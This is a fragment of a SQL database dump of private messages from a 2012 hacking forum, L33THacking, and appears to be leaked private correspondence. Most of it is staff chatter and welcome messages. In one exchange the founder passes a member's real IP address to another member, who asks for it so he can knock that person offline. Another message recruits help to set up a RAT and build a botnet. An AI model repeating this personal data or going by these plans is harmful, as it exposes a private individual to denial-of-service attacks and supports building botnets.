jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.\r\n[/quote]\r\n\r\nWhen was the last post?\r\n[/quote]\r\n\r\n10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.', '1350094641', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3035', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Yo', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.\r\n[/quote]\r\n\r\nWhen was the last post?\r\n[/quote]\r\n\r\n10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.\r\n[/quote]\r\n\r\nWell OK then ;)\r\n[/quote]\r\nDoes that help you?\r\n[/quote]\r\n\r\nNope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey?\r\n[/quote]\r\nNope\r\n[/quote]\r\n\r\n\r\nok, I don\'t know why but I sleepy already. It\'s like 10 now and I normally sleep at 2.\r\n[/quote]\r\nOh damn\r\n[/quote]\r\n\r\nGlowing is definitely Neon because neon lights are always glowing.\r\n\r\nGreed is a legit member from ubers\r\n\r\nMonkey is some SOB trying to SE Apathy to sell him my sites DB but luckily Apathy can\'t download backups. \r\n[/quote]\r\nIP BAN HIS ASS AND GIVE ME HIS FUCKING IP I WILL HIT HIM OFFLINE\r\n[/quote]\r\n\r\nWoah I\'m keeping him on the site to see to what extent he can go till and yes sir he\'s IP is 108.87.19.149\r\n\r\nThat\'s the real IP because he logged in a lot of times and logs in every 2nd hour and every time that IP was used.', '1350097067', '0', '1', '0', '1', '0', '0', '1350097166'); INSERT INTO mybb_privatemessages VALUES('3020', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: GIVEAWAY CONTEST', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI have a new Thread about a Huge GIVEAWAY. I want that everyone is involved in the Contest, so thats why I\'m asking you can you PM everyone to go to my contest i will be glad if you do it and you will receive the Huge Ultimate Pack too.\r\n\r\nThread: http://l33thacking.net/thread-822.html\r\n\r\nBye,\r\n[/quote]\r\n\r\nI can\'t do a mass PM because if I do it for one person then everyone will ask me to mass PM others then it will get annoying to see spammed by PM but I can sticky the thread for you if you would like.\r\n[/quote]\r\n\r\nOkay thanks that you want to do still something for my thread\r\n[/quote]\r\n\r\nI\'ll sticky it and can you update your email?', '1350094472', '0', '1', '0', '1', '0', '0', '1350221282'); INSERT INTO mybb_privatemessages VALUES('3018', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: GIVEAWAY CONTEST', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'VirtualLegend\']\r\nHi,\r\n\r\nI have a new Thread about a Huge GIVEAWAY. I want that everyone is involved in the Contest, so thats why I\'m asking you can you PM everyone to go to my contest i will be glad if you do it and you will receive the Huge Ultimate Pack too.\r\n\r\nThread: http://l33thacking.net/thread-822.html\r\n\r\nBye,\r\n[/quote]\r\n\r\nI can\'t do a mass PM because if I do it for one person then everyone will ask me to mass PM others then it will get annoying to see spammed by PM but I can sticky the thread for you if you would like.\r\n[/quote]\r\n\r\nOkay thanks that you want to do still something for my thread', '1350094424', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2900', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey...', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? \r\n[/quote]\r\n\r\nYeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?\r\n[/quote]\r\n\r\nWhat do you mean?\r\n[/quote]\r\n\r\nYou said bump some threads lol. If you mean on the forum yeh. I\'ve been bumping all day :P. I would like to talk to you about promoting the forum and advertising at some point if that is cool. Maybe I can help purchase some ad space or something somewhere. We need to start building our member base :)\r\n[/quote]\r\n\r\nI totally agree with you. I\'m coming online in 4 minutes. \r\n[/quote]\r\n\r\nOh sorry man had to go to work. Im on skype now if you wanna chat', '1349835272', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2903', '82', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '1', 'Dude... ', '0', 'Don\'t leave I know we did not start off on the right foot but I still think you are a great member. Dont go.', '1349841719', '0', '1', '0', '0', '0', '2', '1349867957'); INSERT INTO mybb_privatemessages VALUES('2904', '2', '82', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Dude... ', '0', 'Don\'t leave I know we did not start off on the right foot but I still think you are a great member. Dont go.', '1349841719', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2905', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Re: Hey...', '0', '[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'ƒ???????????g\']\r\nHey alright I\'m going to be honest here. I think you should close that thread about AF in the general section. It really looks bad for LH. We should be accepting of other forums as long as they don\'t advertise on LH. And we don\'t need to stir up any more shit. That battle is just gonna keep on going. So you should close that thread or delete it. \r\n\r\nJust my opinion :)[/align]\r\n[/quote]\r\n\r\nTrue, closed. Can you bump some threads? \r\n[/quote]\r\n\r\nYeh sure....(my phone is about to die lol fuck). But yeh u got threads on other forums?\r\n[/quote]\r\n\r\nWhat do you mean?\r\n[/quote]\r\n\r\nYou said bump some threads lol. If you mean on the forum yeh. I\'ve been bumping all day :P. I would like to talk to you about promoting the forum and advertising at some point if that is cool. Maybe I can help purchase some ad space or something somewhere. We need to start building our member base :)\r\n[/quote]\r\n\r\nI totally agree with you. I\'m coming online in 4 minutes. \r\n[/quote]\r\n\r\nOh sorry man had to go to work. Im on skype now if you wanna chat\r\n[/quote]\r\n\r\nI\'m doing my homework now but I\'ll come online in 20 mins. ', '1349842765', '0', '1', '0', '1', '0', '0', '1349844798'); INSERT INTO mybb_privatemessages VALUES('3016', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.', '1350094359', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2908', '249', '1', '249', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Moving', '0', '[quote=\'t3h jok3r\']\r\nI saw your post on the thread in which you stated that you left Anarchy and I\'m sure you read my reply too. Now what I would like to know is why did you exactly leave AF?\r\n[/quote]\r\n\r\nAnar was being a dick. He went raving around saying that t3h jok3r from L33tHacking had DoXed one of his own members and that he was scammed 30 bucks for buying your site.\r\n\r\nI really couldn\'t believe that somebody would fall for buying a site like this for 30 bucks. It\'s absolutely ridiculous. After I said that to The Anarchist, he banned my account, so then I posted here and found that he was guilty otherwise he would never had done so, but then he must of had an account here *obviously* and unbanned my account to make you think I was some idiot or something.', '1349856803', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2910', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Unique', '0', 'can you change the forum icon to this?\r\n\r\nhttp://i.imgur.com/qvfmJ.png\r\n\r\nthanks alot bro.', '1349863210', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2912', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Mod', '0', 'I have done what you asked ', '1349876526', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2913', '62', '62', '203', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'updated group page', '0', 'updated the new group page with some rats :3\r\n', '1349887416', '0', '1', '0', '1', '0', '2', '1349887463'); INSERT INTO mybb_privatemessages VALUES('2916', '62', '62', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '1', 'Re: Unique', '0', '[quote=\'R?????zo?\']\r\ncan you change the forum icon to this?\r\n\r\nhttp://i.imgur.com/qvfmJ.png\r\n\r\nthanks alot bro.\r\n[/quote]\r\n\r\nConsider it done. ', '1349910952', '0', '3', '1349945450', '1', '0', '0', '1349945286'); INSERT INTO mybb_privatemessages VALUES('3013', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.', '1350093925', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2928', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'NeonLights', '0', 'Neonlights just said he is leaving LH because you are giving him an attitude and getting a new leader for his group. He said it in the group chat.', '1349919385', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2929', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Fw: my group section fucking deleted?', '0', '[quote=\'NeonLights\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\nok so im already pissed\r\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\r\ntook me for fucking ever to make...\r\n[/quote]\r\n\r\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\r\n\r\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\r\n[/quote]\r\n\r\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\r\nand there was nothing in that section and its ur fault so dont get moody for shit...\r\n[/quote]', '1349919454', '0', '3', '1349919707', '1', '0', '0', '1349919637'); INSERT INTO mybb_privatemessages VALUES('3038', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hello', '0', 'hello \r\nplease upgrade my acount , so that i become able to post premium link.', '1350100726', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3039', '255', '255', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"255\";}}', '1', 'Re: hello', '0', '[quote=\'sbhshroy2\']\r\nhello \r\nplease upgrade my acount , so that i become able to post premium link.\r\n[/quote]\r\n\r\nHey there. Thanks for joining my website and I have upgraded your account.', '1350100835', '0', '3', '1350101621', '1', '0', '0', '1350101579'); INSERT INTO mybb_privatemessages VALUES('3034', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nYo man do you know where I could get a cheap domain name and do you think you could get me some hosting or something? I want to make a forum and partner it up with LH. Dont worry I will still be active on LH.\r\n[/quote]\r\n\r\nOffshore or onshore? \r\n[/quote]\r\nDoesnt matter, it might or might not contain hacking.\r\n[/quote]\r\n\r\nFor onshore I could a cheap hosting but domain depends. \r\n[/quote]\r\nOh okay and BTW ultimatum is from AF and is spying on our forum and he might be trying to leak also.\r\n[/quote]\r\n\r\nYeah I noticed.\r\n[/quote]\r\nAlso is apathy still going to be an admin?\r\n[/quote]\r\nGiving him another chance he said he was away because of the thanksgiving. \r\n[/quote]\r\nYou know thats a lie because he is on HF and in a Official group with me and he has been posting since I cam back.\r\n[/quote]\r\n\r\nCan I get a screenshot or something to back up myself while talking to him?\r\n[/quote]\r\nNevermind it was on 10-9-12 but if you want that screenshot then I could get it for you.\r\n[/quote]\r\n\r\nWhen was the last post?\r\n[/quote]\r\n\r\n10-09-2012, 09:12 PM (This post was last modified: 10-09-2012 09:12 PM by Apathy.\r\n[/quote]\r\n\r\nWell OK then ;)\r\n[/quote]\r\nDoes that help you?\r\n[/quote]\r\n\r\nNope, it basically backups his story which means that he was out of town. BTW do you know the user Monkey?\r\n[/quote]\r\nNope\r\n[/quote]\r\n\r\n\r\nok, I don\'t know why but I sleepy already. It\'s like 10 now and I normally sleep at 2.\r\n[/quote]\r\nOh damn\r\n[/quote]\r\n\r\nGlowing is definitely Neon because neon lights are always glowing.\r\n\r\nGreed is a legit member from ubers\r\n\r\nMonkey is some SOB trying to SE Apathy to sell him my sites DB but luckily Apathy can\'t download backups. \r\n[/quote]\r\nIP BAN HIS ASS AND GIVE ME HIS FUCKING IP I WILL HIT HIM OFFLINE', '1350096662', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4008', '318', '318', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"318\";}}', '1', 'Amanda Todd', '0', 'Hi,\r\n\r\nI noticed that ever since you have registered you have been viewing my members profiles and random sections. Is there anything in specific you are looking for?', '1351983835', '0', '1', '0', '1', '0', '0', '1351984826'); INSERT INTO mybb_privatemessages VALUES('4010', '160', '160', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"160\";}}', '1', 'Re: Hey Guys', '0', '[quote=\'Jacob\']\r\nDo you want to help me set up the RAT, and build a BotNet?\r\n[/quote]\r\n\r\nSure what RAT are you using?', '1352012444', '0', '3', '1352032118', '1', '0', '0', '1352030791'); INSERT INTO mybb_privatemessages VALUES('2933', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'Ratters', '0', 'Do you want to be the new leader of the Ratters group?', '1349919648', '0', '1', '0', '1', '0', '0', '1349952187'); INSERT INTO mybb_privatemessages VALUES('3041', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sbhshroy2\']\r\nhello \r\nplease upgrade my acount , so that i become able to post premium link.\r\n[/quote]\r\n\r\nHey there. Thanks for joining my website and I have upgraded your account.\r\n[/quote]\r\n\r\nthanks.', '1350101621', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3043', '255', '1', '255', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'i have a question related to postin a thread', '0', 'can i post premium acount with adf.ly link.', '1350102042', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2935', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: my group section fucking deleted?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\nok so im already pissed\r\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\r\ntook me for fucking ever to make...\r\n[/quote]\r\n\r\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\r\n\r\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\r\n[/quote]\r\n\r\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\r\nand there was nothing in that section and its ur fault so dont get moody for shit...\r\n[/quote]\r\n[/quote]\r\nWelp', '1349919707', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3044', '255', '255', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"255\";}}', '1', 'Re: i have a question related to postin a thread', '0', '[quote=\'sbhshroy2\']\r\ncan i post premium acount with adf.ly link.\r\n[/quote]\r\n\r\nYeah adf.ly links are allowed but survey links are not allowed on L33THacking.', '1350102099', '0', '3', '1350102193', '1', '0', '0', '1350102167'); INSERT INTO mybb_privatemessages VALUES('4003', '315', '315', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"315\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum kanep.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1351936918', '0', '1', '0', '0', '0', '0', '1351936929'); INSERT INTO mybb_privatemessages VALUES('4004', '5', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '1', 'Hey Guys', '0', 'Do you want to help me set up the RAT, and build a BotNet?', '1351959334', '0', '3', '1352012444', '1', '0', '0', '1352012423'); INSERT INTO mybb_privatemessages VALUES('4005', '160', '5', '160', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Hey Guys', '0', 'Do you want to help me set up the RAT, and build a BotNet?', '1351959334', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4006', '316', '316', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"316\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum luc1f3r.n008.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1351963223', '0', '0', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('4007', '318', '318', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"318\";}}', '1', 'Welcome to L33T Hacking!', '0', 'Welcome to our forum Amanda Todd.\r\n\r\nI am the founder of the L33THacking, if you have any problems or have any questions then feel free to contact any Staff member from our [url=http://l33thacking.net/showteam.php]Staff list[/url].\r\n\r\nFeel free to view our [url=http://l33thacking.net/misc.php?action=help]Help Documents[/url] because answers to most of your questions can be found in the Help Documents.\r\n\r\nHope you enjoy our forums.\r\n\r\nL33T Hacking\r\nhttp://l33thacking.net', '1351983411', '0', '1', '0', '0', '0', '0', '1351984839'); INSERT INTO mybb_privatemessages VALUES('2938', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: my group section fucking deleted?', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\nok so im already pissed\r\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\r\ntook me for fucking ever to make...\r\n[/quote]\r\n\r\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\r\n\r\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\r\n[/quote]\r\n\r\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\r\nand there was nothing in that section and its ur fault so dont get moody for shit...\r\n[/quote]\r\n[/quote]\r\nWelp\r\n[/quote]\r\n\r\nWhat?', '1349919831', '0', '3', '1349919959', '1', '0', '0', '1349919920'); INSERT INTO mybb_privatemessages VALUES('2940', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: my group section fucking deleted?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\nok so im already pissed\r\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\r\ntook me for fucking ever to make...\r\n[/quote]\r\n\r\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\r\n\r\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\r\n[/quote]\r\n\r\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\r\nand there was nothing in that section and its ur fault so dont get moody for shit...\r\n[/quote]\r\n[/quote]\r\nWelp\r\n[/quote]\r\n\r\nWhat?\r\n[/quote]\r\nWe lost a member', '1349919959', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2941', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: my group section fucking deleted?', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\nok so im already pissed\r\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\r\ntook me for fucking ever to make...\r\n[/quote]\r\n\r\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\r\n\r\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\r\n[/quote]\r\n\r\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\r\nand there was nothing in that section and its ur fault so dont get moody for shit...\r\n[/quote]\r\n[/quote]\r\nWelp\r\n[/quote]\r\n\r\nWhat?\r\n[/quote]\r\nWe lost a member\r\n[/quote]\r\n\r\nTrue he was really active. We lost two great members :\'(\r\n\r\nNeonlight has a lot of attitude so he was going to get banned someday because if he couldn\'t stay on HF, ubers and other hacking communities then staying on LH is a mission. He gets banned everywhere for having too much attitude.\r\n\r\nBe honest this time was it my fault?', '1349920098', '0', '3', '1349920349', '1', '0', '0', '1349920231'); INSERT INTO mybb_privatemessages VALUES('2943', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: my group section fucking deleted?', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'NeonLights\']\r\nok so im already pissed\r\nand now i noticed my gourp section is deleted and al my fucking threads that i made also -.-\r\ntook me for fucking ever to make...\r\n[/quote]\r\n\r\nGuess what, you fucking accessed the staff section which you weren\'t suppose to then I investigated what was the fucking case then I found that I needed to fucking re-make your group. I\'m not in the mood today so didn\'t think of anything so re-made your goddamn group and went offline. Now you need fucking permission to access forums and I forgot to edit it.\r\n\r\nYou want to fucking have attitude then go for it because now ratters will have a new leader.\r\n[/quote]\r\n\r\nfine be that way get a new leader im leaving the forums if u wanna be a shit fuck like this...\r\nand there was nothing in that section and its ur fault so dont get moody for shit...\r\n[/quote]\r\n[/quote]\r\nWelp\r\n[/quote]\r\n\r\nWhat?\r\n[/quote]\r\nWe lost a member\r\n[/quote]\r\n\r\nTrue he was really active. We lost two great members :\'(\r\n\r\nNeonlight has a lot of attitude so he was going to get banned someday because if he couldn\'t stay on HF, ubers and other 